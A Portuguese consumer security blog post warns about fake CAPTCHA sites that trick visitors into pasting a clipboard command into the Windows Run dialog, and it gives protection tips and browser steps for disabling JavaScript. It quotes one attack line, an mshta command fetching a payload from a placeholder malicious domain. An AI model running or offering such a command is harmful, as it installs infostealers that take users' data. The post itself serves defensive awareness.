Segurança

Sites falsos de CAPTCHA roubam seus dados: saiba como se proteger

Redação TechParaTodos
Redação TechParaTodos

Sites falsos de CAPTCHA estão roubando informações sensíveis do seu computador! Parece inacreditável, né? Mas essa nova técnica de phishing é bastante sofisticada e enganosa. Neste post, vamos desvendar como esses sites funcionam e como você pode se proteger.

Contents
Como funciona o ataque?Como se protegerComo desativar o JavaScript em diferentes navegadoresChromeFirefoxOperaEdge

Tudo começa com sites que oferecem conteúdo popular: filmes, músicas, imagens… Você acessa o site, encontra o que procura, e de repente, precisa provar que não é um robô, passando pelo famigerado CAPTCHA.

Aí que está o truque. Após clicar no checkbox, em vez da tela habitual, você é direcionado a uma nova instrução aparentemente inofensiva, que pede para você pressionar as teclas “Windows + R”, colar um comando na caixa de diálogo que se abre (Ctrl + V) e pressionar Enter.

Como funciona o ataque?

O site malicioso já copiou um comando para sua área de transferência. Esse comando, ao ser executado, instala um malware, geralmente um ladrão de informações (infostealer).

Você vê uma mensagem de “verificação concluída”, mas na verdade, só está vendo a última parte do comando copiado para sua área de transferência. A parte crucial, escondida, é algo como:

mshta https://{domínio_malicioso}/media.file

O comando mshta executa um arquivo malicioso baixado do domínio indicado. Esse arquivo, muitas vezes disfarçado como um arquivo de mídia comum (mp3, mp4, jpg etc.), contém um comando Powershell que instala o malware, como o Lumma Stealer ou SecTopRAT.

Como se proteger

A melhor defesa é a prevenção! Aqui estão algumas dicas importantes:

  • Nunca siga instruções sem antes pensar bem. Analise a solicitação com cuidado.
  • Use um bom antivírus e anti-malware que bloqueie sites e scripts maliciosos.
  • Considere usar extensões de navegador que detectam domínios maliciosos e golpes.
  • Desative o JavaScript em seu navegador ao acessar sites desconhecidos.

Desabilitar o JavaScript impede que o site acesse sua área de transferência e execute o comando malicioso. Entretanto, isso pode quebrar a funcionalidade de alguns sites. Uma alternativa é usar navegadores diferentes para tarefas diferentes.

Como desativar o JavaScript em diferentes navegadores

Chrome

  • Abra o Chrome e clique nos três pontinhos no canto superior direito.
  • Selecione “Configurações”.
  • Clique em “Privacidade e segurança”.
  • Clique em “Configurações do site”.
  • Role até “Conteúdo” e clique em “JavaScript”.
  • Desative o JavaScript.

Firefox

  • Abra o Firefox e clique nos três traços no canto superior direito.
  • Selecione “Configurações”.
  • Vá até a seção “Privacidade e segurança”.
  • Encontre a opção “Permissões” e procure por “JavaScript”.
  • Desmarque “Ativar JavaScript”.
  • Reinicie o Firefox.

Opera

  • Abra o Opera e clique no ícone de configurações.
  • Selecione “Privacidade e segurança”.
  • Clique em “Configurações do site”.
  • Selecione “JavaScript”.
  • Desative o JavaScript.

Edge

  • Abra o Edge e clique nos três pontinhos no canto superior direito.
  • Selecione “Configurações”.
  • Clique em “Cookies e permissões do site”.
  • Role até “Todas as permissões” e selecione “JavaScript”.
  • Desative o JavaScript.

Lembre-se: a sua segurança na internet é crucial! Fique atento aos detalhes e proteja suas informações.

Compartilhe suas experiências e dicas de segurança conosco!

Fonte: Malwarebytes

TAGGED:
Compartilhe esse Artigo
Deixe um Comentário

No TechParaTodos, acreditamos que a tecnologia deve ser simples e acessível. Nosso objetivo é descomplicar o mundo digital com dicas, tutoriais e tendências, ajudando você a aproveitar ao máximo as inovações tecnológicas no dia a dia. 🚀